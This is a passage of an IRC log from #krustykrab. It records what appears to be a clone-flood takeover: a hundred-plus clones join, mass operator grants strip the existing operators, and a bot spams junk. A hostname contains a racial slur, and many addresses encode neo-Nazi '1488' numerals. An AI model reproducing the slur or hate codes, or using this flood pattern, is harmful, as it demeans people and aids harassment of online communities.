[~pluton@2604:180:2:12cc::beef:bacc] has joined #krustykrab 00:19 -!- StUcK2[S [~ClUjAn3L@2604:180:2:12cc:0:1337:1488:666] has joined #krustykrab 00:19 -!- bu [~the_h@2604:180:2:12cc::fed:bed] has joined #krustykrab 00:19 -!- ``vampir [~ScrurtaV@2604:180:2:12cc:1:3:5:2] has joined #krustykrab 00:19 -!- NE-HAB [~tafrumo@2604:180:2:12cc::fed:bed] has joined #krustykrab 00:19 -!- ganjaj [~excalaba@2604:180:2:12cc:666:1488:420:bbbb] has joined #krustykrab 00:19 -!- shann [~lunchb0x@2604:180:2:12cc::1488] has joined #krustykrab 00:19 -!- zorprim [~suzie@2604:180:2:12cc:666:1488:420:bbbb] has joined #krustykrab 00:19 -!- spazzo [~PulaPulA@2604:180:2:12cc::1488] has joined #krustykrab 00:19 -!- duppl [~ayna@2604:180:2:12cc:b:a:b:e] has joined #krustykrab 00:19 -!- madeli [~master_o@2604:180:2:12cc::666] has joined #krustykrab 00:19 -!- TheELit [~mistress@2604:180:2:12cc:1488:1488:1488:4151] has joined #krustykrab 00:19 -!- lulcia| [~lunchb0x@2604:180:2:12cc:1488:1488:1488:4151] has joined #krustykrab 00:19 -!- spooky-b [~silverta@2604:180:2:12cc::420] has joined #krustykrab 00:19 -!- _keanu [~Gokuraku@2604:180:2:12cc:b:a:b:e] has joined #krustykrab 00:19 -!- harlo [~PindeMus@2604:180:2:12cc::420] has joined #krustykrab 00:19 -!- goldrak [~blondele@2604:180:2:12cc::dead] has joined #krustykrab 00:19 -!- ambivale [~WormsGam@2604:180:2:12cc::12] has joined #krustykrab 00:19 -!- turkishc [~red_s@2604:180:2:12cc::1337] has joined #krustykrab 00:19 -!- Nit [~oioioii@2604:180:2:12cc::dead] has joined #krustykrab 00:19 -!- absol [~meb@2604:180:2:12cc::6667:1fc] has joined #krustykrab 00:19 -!- blackthu [~rp4k@2604:180:2:12cc::5161] has joined #krustykrab 00:19 -!- Nic [~ShawnZZZ@2604:180:2:12cc::bad:91] has joined #krustykrab 00:19 -!- nus [~c0ker0x@2604:180:2:12cc::bad:91] has joined #krustykrab 00:19 -!- giacin [~cybersam@2604:180:2:12cc:c:a:b:e] has joined #krustykrab 00:19 -!- seifull [~butch_@2604:180:2:12cc::beef:bacc] has joined #krustykrab 00:19 -!- jacu [~eltoni_2@2604:180:2:12cc:1:2:3:4] has joined #krustykrab 00:19 -!- tot [~distrakt@2604:180:2:12cc:feed:babe:beef:0] has joined #krustykrab 00:19 -!- marv [~ShtoSMEN@2604:180:2:12cc:feed:babe:beef:0] has joined #krustykrab 00:19 -!- izol [~nyhusern@2604:180:2:12cc:2222:2222:2222:222] has joined #krustykrab 00:19 -!- GoNCaGuL [~GGG@2604:180:2:12cc:f::d] has joined #krustykrab 00:19 -!- memol [~xdikgj@2604:180:2:12cc::deaf:babe] has joined #krustykrab 00:19 -!- ha [~Trance@2604:180:2:12cc:1:2:3:4] has joined #krustykrab 00:19 -!- meid [~NiceNick@2604:180:2:12cc::abcd:ef] has joined #krustykrab 00:19 -!- karlsru [~shamrock@2604:180:2:12cc::666:babe] has joined #krustykrab 00:19 -!- pioggian [~xender--@2604:180:2:12cc::666:babe] has joined #krustykrab 00:19 -!- serlanci [~stoned@2604:180:2:12cc::b00f] has joined #krustykrab 00:19 -!- Gort [~xycene@2604:180:2:12cc:2222:2222:2222:222] has joined #krustykrab 00:19 -!- proz [~JaDaK@2604:180:2:12cc::b00f] has joined #krustykrab 00:19 -!- Mp3Drea [~pretyboy@2604:180:2:12cc::6667:1fc] has joined #krustykrab 00:19 -!- Vaemp [~mob|Zarb@2604:180:2:12cc::12] has joined #krustykrab 00:19 -!- darkgir [~dian27@2604:180:2:12cc::5161] has joined #krustykrab 00:19 -!- freefa [~MARIUS_B@2604:180:2:12cc:c:a:b:e] has joined #krustykrab 00:19 -!- overki [~ehpkau@2604:180:2:12cc::abcd:ef] has joined #krustykrab 00:19 -!- crate [~Sen}{}{{@2604:180:2:12cc:dddd:dddd:dddd:dddd] has joined #krustykrab 00:19 -!- duedeld [~BestCoys@2604:180:2:12cc:ffff:ffff:ffff:ffff] has joined #krustykrab 00:19 -!- owne [~reppy@2604:180:2:12cc:dddd:dddd:dddd:dddd] has joined #krustykrab 00:19 -!- diffida [~st3fica@2604:180:2:12cc:ff:ff:ff:ff] has joined #krustykrab 00:19 -!- corg [~phoenix8@2604:180:2:12cc:ffff:ffff:ffff:ffff] has joined #krustykrab 00:19 -!- crimsont [~oakshowe@2604:180:2:12cc:ff:ff:ff:ff] has joined #krustykrab 00:19 -!- gucc [~pawwozza@2604:180:2:12cc:a:a:a:a] has joined #krustykrab 00:19 -!- iftekh [~M-amNasc@2604:180:2:12cc:a:a:a:a] has joined #krustykrab 00:19 -!- plut [~sef_mari@2604:180:2:12cc:c:c:c:c] has joined #krustykrab 00:19 -!- ph [~cosmoste@2604:180:2:12cc:1:2:3:0] has joined #krustykrab 00:19 -!- guest220 [~trackzil@2604:180:2:12cc:c:c:c:c] has joined #krustykrab 00:19 -!- alexande [~rzv@2604:180:2:12cc:3:6:2:7] has joined #krustykrab 00:19 -!- na_ni [~karencit@2604:180:2:12cc:1:2:3:0] has joined #krustykrab 00:19 -!- opt [~SonFuck@2604:180:2:12cc:3:6:2:7] has joined #krustykrab 00:19 -!- mFa-ht [~leg\out@2604:180:2:12cc:192:1928:5691:1525] has joined #krustykrab 00:19 -!- CeVVaL-c [~MazMaz@2604:180:2:12cc:192:1928:5691:1525] has joined #krustykrab 00:19 -!- ladycie [~lau_tm@2604:180:2:12cc::deed] has joined #krustykrab 00:19 -!- RandyAn [~kazuya_u@2604:180:2:12cc::deed] has joined #krustykrab 00:19 -!- senzafi [~xvid@2604:180:2:12cc:0:dead:fed:bed] has joined #krustykrab 00:19 -!- Brav [~badboy-p@2604:180:2:12cc:0:dead:fed:bed] has joined #krustykrab 00:19 -!- guest019 [~dippset@2604:180:2:12cc:fed:fed:fed:fed] has joined #krustykrab 00:19 -!- [carniva [~perr@2604:180:2:12cc:fed:fed:fed:fed] has joined #krustykrab 00:19 -!- litfi [~mark_hom@2604:180:2:12cc:aaaa:ffff:0:1111] has joined #krustykrab 00:19 -!- montgome [~mm03zzp@2604:180:2:12cc::b00b] has joined #krustykrab 00:19 -!- okrut [~broly@2604:180:2:12cc::b00b] has joined #krustykrab 00:19 -!- at [~andrada2@2604:180:2:12cc:aaaa:ffff:0:1111] has joined #krustykrab 00:19 -!- apparenz [~godhand2@2604:180:2:12cc::151:b00f] has joined #krustykrab 00:19 -!- pappalar [~pdoublei@2604:180:2:12cc::deaf:babe] has joined #krustykrab 00:19 -!- ciandri [~abben@2604:180:2:12cc:1111:1111:1111:1111] has joined #krustykrab 00:19 -!- panther [~pawwozzi@2604:180:2:12cc:4444:4444:4444:4444] has joined #krustykrab 00:19 -!- mumz [~VersCuVe@2604:180:2:12cc:5555:5555:5555:5555] has joined #krustykrab 00:19 -!- uhaha [~VersCuVe@2604:180:2:12cc:4444:4444:4444:4444] has joined #krustykrab 00:19 -!- up_fu^ [~ceesee@2604:180:2:12cc:f::d] has joined #krustykrab 00:19 -!- adipa [~cold13@2604:180:2:12cc:5555:5555:5555:5555] has joined #krustykrab 00:19 -!- soulreb [~italiano@2604:180:2:12cc::feed] has joined #krustykrab 00:19 -!- ciclami [~Patricya@2604:180:2:12cc:6666:6666:6666:6666] has joined #krustykrab 00:19 -!- taiw [~feray-e@2604:180:2:12cc:6666:6666:6666:6666] has joined #krustykrab 00:19 -!- pij [~kel@2604:180:2:12cc:7777:7777:7777:7777] has joined #krustykrab 00:19 -!- moder [~puffnstu@2604:180:2:12cc:fade:bacc:babe:f00d] has joined #krustykrab 00:19 -!- mewl [~Iunita@2604:180:2:12cc:8888:8888:8888:8888] has joined #krustykrab 00:19 -!- uz [~lonnieb@2604:180:2:12cc:8888:8888:8888:8888] has joined #krustykrab 00:19 -!- ma0r [~morad@2604:180:2:12cc::f1b:f0b] has joined #krustykrab 00:19 -!- awiaw [~dialtone@2604:180:2:12cc:1111:1111:1111:1111] has joined #krustykrab 00:19 -!- desideri [~ded|@2604:180:2:12cc:aaaa:aaaa:aaaa:aaaa] has joined #krustykrab 00:19 -!- dogti [~ErhnaM_p@2604:180:2:12cc:3333:3333:3333:3333] has joined #krustykrab 00:19 -!- robb [~gaemfb@2604:180:2:12cc:bbbb:bbbb:bbbb:bbbb] has joined #krustykrab 00:19 -!- bravehea [~naty@2604:180:2:12cc:1:2:3:0] has joined #krustykrab 00:19 -!- [a]]]] [~jaydenyo@2604:180:2:12cc:eeee:eeee:eeee:eeee] has joined #krustykrab 00:19 -!- szkrab [~Motard-@2604:180:2:12cc:3:6:2:7] has joined #krustykrab 00:19 -!- margari [~more@2604:180:2:12cc:ffff:ffff:ffff:ffff] has joined #krustykrab 00:19 -!- dev|l`k| [~IC-T-25@2604:180:2:12cc:a:a:a:a] has joined #krustykrab 00:19 -!- minigon [~direola@2604:180:2:12cc:ff:ff:ff:ff] has joined #krustykrab 00:19 -!- cet [~Denisa15@2604:180:2:12cc:9999:9999:9999:9999] has joined #krustykrab 00:19 -!- soundmon [~HaCuTata@2604:180:2:12cc::deed] has joined #krustykrab 00:19 -!- b0ng [~sacqqk@2604:180:2:12cc:c:c:c:c] has joined #krustykrab 00:19 -!- _o^ [~melani3@2604:180:2:12cc:c:c:c:c] has joined #krustykrab 00:19 -!- zirc0 [~azul_leo@2604:180:2:12cc:dddd:dddd:dddd:dddd] has joined #krustykrab 00:19 -!- afghanba [~Sfarc@2604:180:2:12cc:3:6:2:7] has joined #krustykrab 00:19 -!- purp [~Largaret@2604:180:2:12cc:eeee:eeee:eeee:eeee] has joined #krustykrab 00:19 -!- brookl [~madx971@2604:180:2:12cc:192:1928:5691:1525] has joined #krustykrab 00:19 -!- xtre [~gatorbob@2604:180:2:12cc:ffff:ffff:ffff:ffff] has joined #krustykrab 00:19 -!- Me [~tonerz@2604:180:2:12cc:192:1928:5691:1525] has joined #krustykrab 00:19 -!- sz [~djp@2604:180:2:12cc:a:a:a:a] has joined #krustykrab 00:19 -!- vince [~hitokiri@2604:180:2:12cc:0:dead:fed:bed] has joined #krustykrab 00:19 -!- firstla [~jiffe@2604:180:2:12cc:0:dead:fed:bed] has joined #krustykrab 00:19 -!- IaNM [~SanJe@2604:180:2:12cc:1:2:3:0] has joined #krustykrab 00:19 -!- pau [~qibgtn@2604:180:2:12cc::b00b] has joined #krustykrab 00:19 -!- voodo [~SonFuck@2604:180:2:12cc:fed:fed:fed:fed] has joined #krustykrab 00:19 -!- cofk [~pac22@2604:180:2:12cc:aaaa:ffff:0:1111] has joined #krustykrab 00:19 -!- l`avvele [~Cfc|xAv1@2604:180:2:12cc:aaaa:ffff:0:1111] has joined #krustykrab 00:19 -!- |bra [~zopper@2604:180:2:12cc:fed:fed:fed:fed] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o knopi] by stin 00:19 -!- mode/#krustykrab [+o qam] by pietr 00:19 -!- mode/#krustykrab [+o va] by gianpao 00:19 -!- mode/#krustykrab [+o finb] by pietr 00:19 -!- mode/#krustykrab [+o garko1] by pietr 00:19 -!- mode/#krustykrab [+o pitt_bu] by stin 00:19 -!- mode/#krustykrab [+o paler] by stin 00:19 -!- mode/#krustykrab [+o renew] by stin 00:19 -!- mode/#krustykrab [+o f4b1o`[n] by stin 00:19 -!- mode/#krustykrab [+o blue-ang] by gianpao 00:19 -!- mode/#krustykrab [+o cicikizl] by gianpao 00:19 -!- mode/#krustykrab [+o su] by gianpao 00:19 -!- gianpao [~Trance@2604:180:2:12cc::c] has quit [Excess Flood] 00:19 -!- mode/#krustykrab [+o marl] by gianpao 00:19 -!- stin [~boggo@2604:180:2:12cc::c0de] has quit [Excess Flood] 00:19 -!- jessica- [~KeeMeAwa@2604:180:2:12cc:ff:ff:ff:ff] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o samra`ar] by Demir32A 00:19 -!- mode/#krustykrab [+o aky`o] by pietr 00:19 -!- mode/#krustykrab [+o dragu] by Demir32A 00:19 -!- mode/#krustykrab [+o loserp] by Demir32A 00:19 -!- mode/#krustykrab [+o cheev] by Demir32A 00:19 -!- Demir32A [~marky@2604:180:2:12cc::c0de] has quit [Excess Flood] 00:19 -!- mode/#krustykrab [+o cristj] by Demir32A 00:19 -!- mode/#krustykrab [+o ber] by pietr 00:19 -!- mode/#krustykrab [+o proz] by guest117 00:19 -!- mode/#krustykrab [+o muam] by isild 00:19 -!- mode/#krustykrab [+o t3x] by phreakaz 00:19 -!- mode/#krustykrab [+o crazyki] by pietr 00:19 -!- ravn [~khoogy16@2604:180:2:12cc::b00b] has joined #krustykrab 00:19 -!- nibble [~GGG@BIG.BLACK.NIGGA.ONLINE] has joined #krustykrab 00:19 -!- pietr [~sharkfin@2604:180:2:12cc::666] has quit [Excess Flood] 00:19 -!- mode/#krustykrab [+o Nygi] by pietr 00:19 -!- mode/#krustykrab [+o Mp3Drea] by guest117 00:19 -!- mode/#krustykrab [+o dill] by phreakaz 00:19 -!- mode/#krustykrab [+o TU-PA] by phreakaz 00:19 -!- mode/#krustykrab [+o Ayl] by phreakaz 00:19 -!- mode/#krustykrab [+o melon] by phreakaz 00:19 -!- phreakaz [~highline@2604:180:2:12cc:0:f33d:fe3d:feed] has quit [Excess Flood] 00:19 <@ovh> knopi: <@techman> this is like 10000 lines of crap ascii 00:19 -!- mode/#krustykrab [+o `gi|me] by phreakaz 00:19 -!- mode/#krustykrab [+o Vaemp] by guest117 00:19 -!- mode/#krustykrab [+o funkn] by isild 00:19 -!- mode/#krustykrab [+o melon`mi] by isild 00:19 -!- mode/#krustykrab [+o ano] by isild 00:19 -!- mode/#krustykrab [+o ravn] by isild 00:19 <@ovh> qam: benis 00:19 <@ovh> finb: install gentoo 00:19 <@ovh> garko1: benis 00:19 <@ovh> va: 00:19 -!- mode/#krustykrab [+o nibble] by isild 00:19 <@ovh> blue-ang: <@techman> this is like 10000 lines of crap ascii 00:19 <@ovh> cicikizl: 00:19 <@ovh> su: benis 00:19 <@ovh> marl: <@techman> this is like 10000 lines of crap ascii 00:19 -!- [b]ulga [~gillemie@2604:180:2:12cc:dddd:dddd:dddd:dddd] has joined #krustykrab 00:19 <@ovh> bigsh: h 00:19 -!- mode/#krustykrab [+o [b]ulga] by isild 00:19 <@ovh> pitt_bu: install gentoo 00:19 -!- mode/#krustykrab [+oooo cofk l`avvele ravn pau] by nibble 00:19 <@ovh> paler: 00:19 -!- mode/#krustykrab [+oooo voodo |bra firstla vince] by ravn 00:19 -!- mode/#krustykrab [+oooo soundmon Me brookl szkrab] by proz 00:19 -!- mode/#krustykrab [+oooo jessica- xtre margari [a]]]]] by pau 00:19 -!- mode/#krustykrab [+oooo _o^ sz dev|l`k| minigon] by voodo 00:19 -!- mode/#krustykrab [+oooo cet uz mewl pij] by cofk 00:19 -!- mode/#krustykrab [+oooo purp zirc0 robb desideri] by l`avvele 00:19 -!- mode/#krustykrab [+oooo afghanba IaNM bravehea b0ng] by |bra 00:19 -!- mode/#krustykrab [+o ravn] by proz 00:19 -!- mode/#krustykrab [+oooo taiw ciclami adipa mumz] by Vaemp 00:19 -!- mode/#krustykrab [+oooo uhaha panther dogti awiaw] by Mp3Drea 00:19 -!- mode/#krustykrab [+oooo ciandri ma0r moder apparenz] by vince 00:19 -!- mode/#krustykrab [+oooo meid overki pappalar soulreb] by firstla 00:19 -!- mode/#krustykrab [+o nibble] by proz 00:19 -!- mode/#krustykrab [+oooo memol up_fu^ GoNCaGuL izol] by robb 00:19 -!- mode/#krustykrab [+oooo [b]ulga Gort marv tot] by [a]]]] 00:19 -!- mode/#krustykrab [+oooo bu ha jacu nus] by bravehea 00:19 -!- mode/#krustykrab [+oooo pioggian karlsru freefa giacin] by margari 00:19 -!- mode/#krustykrab [+oooo Nic JeLop ano goldrak] by szkrab 00:19 -!- mode/#krustykrab [+oooo darkgir blackthu absol ambivale] by minigon 00:19 -!- mode/#krustykrab [+oooo serlanci _keanu duppl NE-HAB] by dev|l`k| 00:19 -!- mode/#krustykrab [+oooo Nit TheELit lulcia| shann] by muam 00:19 -!- mode/#krustykrab [+o [b]ulga] by proz 00:19 -!- mode/#krustykrab [+oooo spazzo zorprim ganjaj ``vampir] by moder 00:19 -!- mode/#krustykrab [+oooo spitl drave seifull StUcK2[S] by ma0r 00:19 -!- mode/#krustykrab [+oooo sna turkishc melon`mi harlo] by awiaw 00:19 -!- mode/#krustykrab [+oooo spooky-b madeli darklov whow] by dogti 00:19 -!- mode/#krustykrab [+oooo voxpopu prov chawd mi] by adipa 00:19 -!- mode/#krustykrab [+oooo sam-sam- siracus os dedicat] by ciclami 00:19 -!- mode/#krustykrab [+oooo scew-u- jama funkn madedd] by taiw 00:19 -!- mode/#krustykrab [+oooo nigg dora _huch crev] by pij 00:19 -!- mode/#krustykrab [+oooo teags DarK^Lt nedr ynnos] by mewl 00:19 -!- mode/#krustykrab [+oooo wysokil pinesna Aldo symfon] by uz 00:19 -!- mode/#krustykrab [+oooo _super_g game^ov stonefa astri] by cet 00:19 -!- mode/#krustykrab [+oooo DONETH isab sall aracel] by desideri 00:19 -!- mode/#krustykrab [+oooo Greeney izw ^stell Oguzh] by zirc0 00:19 -!- mode/#krustykrab [+oooo special ruff-ne manow vort] by purp 00:19 -!- mode/#krustykrab [+oooo jasml Fallm diavolet ]g|o|{] by xtre 00:19 -!- mode/#krustykrab [+oooo KOCE gioiadiv Galldri sti] by _o^ 00:19 -!- mode/#krustykrab [+oooo netbomb stylish^ wow_ker waf] by jessica- 00:19 -!- mode/#krustykrab [+oooo love-to- borisbre Hm [_rose] by b0ng 00:19 -!- mode/#krustykrab [+oooo fuyu takt hexaaaaa v4cc4] by sz 00:19 -!- mode/#krustykrab [+oooo spi lamer ^f4lk binta] by afghanba 00:19 -!- mode/#krustykrab [+oooo Donjua dlvlnki junfl krak] by soundmon 00:19 -!- mode/#krustykrab [+oooo capitan york_thi _-goriar nop`o] by brookl 00:19 -!- mode/#krustykrab [+oooo guest439 oceani ch k4] by IaNM 00:19 <@ovh> renew: <@techman> this is like 10000 lines of crap ascii 00:19 -!- mode/#krustykrab [+oooo ADRESims |ndoch| cestm Tota|Ev] by Me 00:19 -!- mode/#krustykrab [+oooo cansuu StagN han aky`au] by funkn 00:19 -!- mode/#krustykrab [+oooo ep Availabl charlieb CheekyG] by melon`mi 00:19 -!- mode/#krustykrab [+oooo love-val inzen [denver- steppenk] by ano 00:19 -!- mode/#krustykrab [+oooo makda `ade yourna biba`un`] by up_fu^ 00:19 -!- mode/#krustykrab [+oooo BarbieGi jattared hb bagg] by pappalar 00:19 -!- mode/#krustykrab [+oooo ^TwInN romantic cinghi4 susan-la] by overki 00:19 -!- mode/#krustykrab [+oooo pressio bigbr zozzo Politik] by soulreb 00:19 -!- mode/#krustykrab [+oooo ishr cheat dr4g cheev] by apparenz 00:19 -!- mode/#krustykrab [+oooo cristj dia`mir rul bc-] by ciandri 00:19 -!- mode/#krustykrab [+oooo dragu loserp samra`ar hatl] by panther 00:19 -!- mode/#krustykrab [+oooo ftrTrun net-spl at litfi] by uhaha 00:19 -!- mode/#krustykrab [+oooo okrut montgome [carniva guest019] by mumz 00:19 -!- mode/#krustykrab [+oooo CeVVaL-c mFa-ht opt alexande] by t3x 00:19 -!- mode/#krustykrab [+oooo Brav senzafi RandyAn ladycie] by TU-PA 00:19 -!- mode/#krustykrab [+oooo na_ni ph plut guest220] by dill 00:19 -!- mode/#krustykrab [+oooo iftekh gucc diffida crimsont] by melon 00:19 -!- mode/#krustykrab [+oooo duedeld corg crate DeL] by Ayl 00:19 -!- mode/#krustykrab [+oooo owne rafa Grumb chir] by `gi|me 00:19 -!- mode/#krustykrab [+oooo silv asl summerja ^^rossel] by jacu 00:19 -!- mode/#krustykrab [+oooo theque ivon Roberto arapcin] by ha 00:19 -!- mode/#krustykrab [+oooo badwor NOTICEAB Eva-Unit anton] by serlanci 00:19 -!- mode/#krustykrab [+oooo eunu minite pp irss] by darkgir 00:19 -!- mode/#krustykrab [+oooo Fifthco akuf na edg] by tot 00:19 -!- mode/#krustykrab [+oooo SaDIkaEl reli viol3t zai] by marv 00:19 -!- mode/#krustykrab [+oooo z_m niko_1o cameliar _300_o] by karlsru 00:19 -!- mode/#krustykrab [+oooo ist hellmast maha-uja leve] by pioggian 00:19 -!- mode/#krustykrab [+oooo anti|vir radiofol king^of^ sampe] by freefa 00:19 -!- mode/#krustykrab [+oooo hilla cran Bes E|] by izol 00:19 -!- mode/#krustykrab [+oooo `superma jareck danil binba] by GoNCaGuL 00:19 -!- mode/#krustykrab [+oooo kakano rapt vascoros chest] by Gort 00:19 -!- mode/#krustykrab [+oooo _guest12 ging _freefal a|i] by memol 00:19 -!- mode/#krustykrab [+oooo geri-s laila-sh smart`n` [s]trik] by meid 00:19 -!- mode/#krustykrab [+oooo yo federic passbel der_al] by seifull 00:19 -!- mode/#krustykrab [+oooo ank-30 a020b natureo curt] by Nit 00:19 -!- mode/#krustykrab [+oooo TUTUKLUY crazyki ber Nygi] by goldrak 00:19 -!- mode/#krustykrab [+oooo prince-c yaq aky`o vlad] by Nic 00:19 -!- mode/#krustykrab [+oooo ^haker keanu expr _somm] by nus 00:19 -!- mode/#krustykrab [+oooo jackspar mary`z bookasha is0m0r] by _keanu 00:19 -!- mode/#krustykrab [+oooo temporar henr th0rst bianchi] by ambivale 00:19 -!- mode/#krustykrab [+oooo izmir teamextr saN haka] by absol 00:19 -!- mode/#krustykrab [+oooo exta camer _mons mcc] by blackthu 00:19 -!- mode/#krustykrab [+oooo angelmo urinste jarre animam] by giacin 00:19 -!- mode/#krustykrab [+o [b]ulga] by TU-PA 00:19 -!- mode/#krustykrab [+oooo nesto Skyha infolud serd] by madeli 00:19 -!- mode/#krustykrab [+oooo glici highw ibi _spyro_o] by spooky-b 00:19 -!- mode/#krustykrab [+oooo viu sinfo guest555 Sandym] by harlo 00:19 -!- mode/#krustykrab [+oooo racha airpo kololu desdino] by turkishc 00:19 -!- mode/#krustykrab [+oooo f|ow c4tt bastar ][lorddr] by ``vampir 00:19 -!- mode/#krustykrab [+oooo ESMER uyg deepr jonnolo] by zorprim 00:19 -!- mode/#krustykrab [+oooo teste _-thoola da-gambl w] by ganjaj 00:19 -!- mode/#krustykrab [+oooo iban `pluton the_ga channel-] by spazzo 00:19 -!- mode/#krustykrab [+oooo dur sfon peg shar] by shann 00:19 -!- mode/#krustykrab [+oooo Zor vampy giove gattu] by lulcia| 00:19 -!- mode/#krustykrab [+oooo dizz IAMCANAD mastif gilm0] by TheELit 00:19 <@ovh> f4b1o`[n: welcome to the krusty krab 00:19 -!- mode/#krustykrab [+oooo t4k4m0 lorfi safina_k kim18f] by JeLop 00:19 -!- mode/#krustykrab [+oooo billyb [rocke safedbac voglioun] by bu 00:19 -!- mode/#krustykrab [+oooo rub fol guest895 agat] by NE-HAB 00:19 -!- mode/#krustykrab [+oooo mr_karac nyx campanu acidfla] by duppl 00:19 -!- mode/#krustykrab [+oooo witc depechem |attil khergo] by [b]ulga 00:19 -!- mode/#krustykrab [+oooo juli begum-sa operhe son] by mFa-ht 00:19 -!- mode/#krustykrab [+oooo ryoka c-0-r margar giulione] by [carniva 00:19 -!- mode/#krustykrab [+oooo ghos docst SERKAN michel] by okrut 00:19 -!- mode/#krustykrab [+oooo giusep cyg ced fffff] by litfi 00:19 -!- mode/#krustykrab [+oooo morphas| palmi Me-L-i hydroce] by at 00:19 -!- mode/#krustykrab [+oooo paler renew f4b1o`[n marl] by os 00:19 -!- mode/#krustykrab [+oooo bigsh su cicikizl blue-ang] by mi 00:19 -!- mode/#krustykrab [+oooo pitt_bu va garko1 finb] by whow 00:19 <@ovh> hydroce: <@techman> this is like 10000 lines of crap ascii 00:19 -!- mode/#krustykrab [+oo qam knopi] by darklov 00:19 -!- mode/#krustykrab [+o ravn] by aky`o 00:19 -!- mode/#krustykrab [+o nibble] by aky`o 00:19 -!- mode/#krustykrab [+o [b]ulga] by aky`o 00:19 <@ovh> me-l-i: <@techman> this is like 10000 lines of crap ascii 00:19 <@ovh> palmi: benis 00:19 -!- mode/#krustykrab [+o jessica-] by samra`ar, qam 00:19 -!- mode/#krustykrab [+o ravn] by f4b1o`[n 00:19 -!- mode/#krustykrab [+o nibble] by f4b1o`[n 00:19 -!- zmijc [~Puturosu@2604:180:2:12cc:cccc:cccc:cccc:cccc] has joined #krustykrab 00:19 <@ovh> fffff: benis 00:19 -!- mode/#krustykrab [+o [b]ulga] by f4b1o`[n 00:19 <@ovh> morphas|: welcome to the krusty krab 00:19 -!- phreakaz [~highline@2604:180:2:12cc:0:f33d:fe3d:feed] has joined #krustykrab 00:19 -!- stin [~boggo@2604:180:2:12cc::c0de] has joined #krustykrab 00:19 -!- gianpao [~Trance@2604:180:2:12cc::c] has joined #krustykrab 00:19 -!- Demir32A [~marky@2604:180:2:12cc::c0de] has joined #krustykrab 00:19 -!- pietr [~sharkfin@2604:180:2:12cc::666] has joined #krustykrab 00:19 -!- mode/#krustykrab [+o zmijc] by _300_o, rapt, bigsh 00:19 -!- mode/#krustykrab [+o phreakaz] by smart`n` 00:19 -!- mode/#krustykrab [+o stin] by giove 00:19 <@ovh> ced: welcome to the krusty krab 00:19 -!- mode/#krustykrab [+o gianpao] by funkn 00:19 -!- mode/#krustykrab [+o pietr] by york_thi 00:19 -!- mode/#krustykrab [+o Demir32A] by funkn 00:19 <@ovh> cyg: install gentoo 00:19 <@ovh> giusep: h 00:19 <@ovh> serkan: benis 00:19 <@ovh> michel: welcome to the krusty krab 00:19 -!- mode/#krustykrab [+oooo Demir32A pietr gianpao stin] by phreakaz 00:19 <@ovh> ghos: install gentoo 00:19 <@ovh> giulione: benis 00:19 -!- mode/#krustykrab [-oooo voidsta ovh incog mercy] by szkrab 00:19 -!- mode/#krustykrab [-oo brr Ferus] by bravehea 00:19 -!- mode/#krustykrab [-o www] by ravn 00:19 -!- mode/#krustykrab [-oooo moneytree alien finch merchant] by afghanba 00:19 -!- underpra [~qrot@108-208-153-119.lightspeed.frokca.sbcglobal.net] has joined #krustykrab 00:19 -!- TIMAFEI [~fesasb@108-208-153-119.lightspeed.frokca.sbcglobal.net] has joined #krustykrab 00:19 -!- UMANOID [~Kolumb@45.32.23.39] has joined #krustykrab 00:19 -!- mode/#krustykrab [-oooo naf unpriv bballbird GNAA] by IaNM 00:19 -!- hwknz [~evilmayc@45.32.23.39] has joined #krustykrab 00:19 -!- Snatch [~Chilean@60.163.212.239] has joined #krustykrab 00:19 -!- Wolfgang [~sonyr@ns529764.ip-149-56-23.net] has joined #krustykrab 00:19 -!- JeIbi [~resource@ns529764.ip-149-56-23.net] has joined #krustykrab 00:19 -!- andjey [~zoom@147.8.124.5] has joined #krustykrab 00:19 -!- BapBap [~pashabre@147.8.124.5] has joined #krustykrab 00:19 -!- alexkras [~enx@server.ggsitebuilder.com] has joined #krustykrab 00:19 -!- carlo [~Vella@server.ggsitebuilder.com] has joined #krustykrab 00:19 -!- McLaren [~Liogoft@60.163.212.239] has joined #krustykrab 00:20 -!- JeIbi [~resource@ns529764.ip-149-56-23.net] has left #krustykrab [] 00:20 -!- Wolfgang [~sonyr@ns529764.ip-149-56-23.net] has left #krustykrab [] 00:20 -!- alexkras [~enx@server.ggsitebuilder.com] has left #krustykrab [] 00:20 -!- carlo [~Vella@server.ggsitebuilder.com] has left #krustykrab [] 00:20 -!- underpra [~qrot@108-208-153-119.lightspeed.frokca.sbcglobal.net] has left #krustykrab [] 00:20 -!- TIMAFEI [~fesasb@108-208-153-119.lightspeed.frokca.sbcglobal.net] has left #krustykrab [] 00:20 -!- BapBap [~pashabre@147.8.124.5] has left #krustykrab [] 00:20 -!- andjey [~zoom@147.8.124.5] has left #krustykrab [] 00:20 -!- UMANOID [~Kolumb@45.32.23.39] has left #krustykrab [] 00:20 -!- hwknz [~evilmayc@45.32.23.39] has left #krustykrab [] 00:20 -!- McLaren [~Liogoft@60.163.212.239] has left #krustykrab [] 00:20 -!- Snatch [~Chilean@60.163.212.239] has left #krustykrab [] 00:20 -!- JeIbi [~resource@ns529764.ip-149-56-23.net] has joined #krustykrab 00:20 -!- Wolfgang [~sonyr@ns529764.ip-149-56-23.net] has joined #krustykrab 00:20 -!- alexkras [~enx@server.ggsitebuilder.com] has joined #krustykrab 00:20 -!- carlo [~Vella@server.ggsitebuilder.com] has joined #krustykrab 00:20 -!- TIMAFEI [~fesasb@108-208-153-119.lightspeed.frokca.sbcglobal.net] has joined #krustykrab 00:20 -!- underpra [~qrot@108-208-153-119.lightspeed.frokca.sbcglobal.net] has joined #krustykrab 00:20 -!- BapBap [~pashabre@147.8.124.5] has joined #krustykrab 00:20 -!- andjey [~zoom@147.8.124.5] has joined #krustykrab 00:20 -!- UMANOID [~Kolumb@45.32.23.39] has joined #krustykrab 00:20 -!- hwknz [~evilmayc@45.32.23.39] has joined #krustykrab 00:20 -!- McLaren [~Liogoft@60.163.212.239] has joined #krustykrab 00:20 -!- Snatch [~Chilean@60.163.212.239] has joined #krustykrab 00:20 -!- DonnyDark [~skrip@177.140.35.129] has joined #krustykrab 00:20 -!- klokus [~maratej@177.140.35.129] has joined #krustykrab 00:20 -!- Profffa [~emix@211.233.56.228] has joined #krustykrab 00:20 -!- Romeo [~laksys@211.233.56.228] has joined #krustykrab 00:20 -!- live [~allexeyy@ec2-54-244-200-32.us-west-2.compute.amazonaws.com] has joined #krustykrab 00:20 -!- sarrini [~vPalto@ec2-54-244-200-32.us-west-2.compute.amazonaws.com] has joined #krustykrab 00:20 -!- press [~prizrak@177.141.142.148] has joined #krustykrab 00:20 -!- Opel 